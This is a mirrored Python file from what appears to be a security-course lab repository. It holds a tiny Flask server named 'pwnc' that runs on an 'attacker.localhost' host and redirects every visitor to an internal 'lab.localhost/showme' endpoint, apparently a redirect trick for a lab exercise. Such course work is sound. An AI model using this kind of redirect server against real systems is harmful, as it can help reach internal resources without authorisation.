mirror of
https://github.com/20kaushik02/CSE545_SS_Work.git
synced 2025-12-06 07:24:07 +00:00
10 lines
173 B
Python
10 lines
173 B
Python
from flask import Flask, redirect
|
|
|
|
app = Flask("pwnc")
|
|
|
|
@app.route("/")
|
|
def hello():
|
|
return redirect("http://lab.localhost/showme")
|
|
|
|
app.run("attacker.localhost", 9999)
|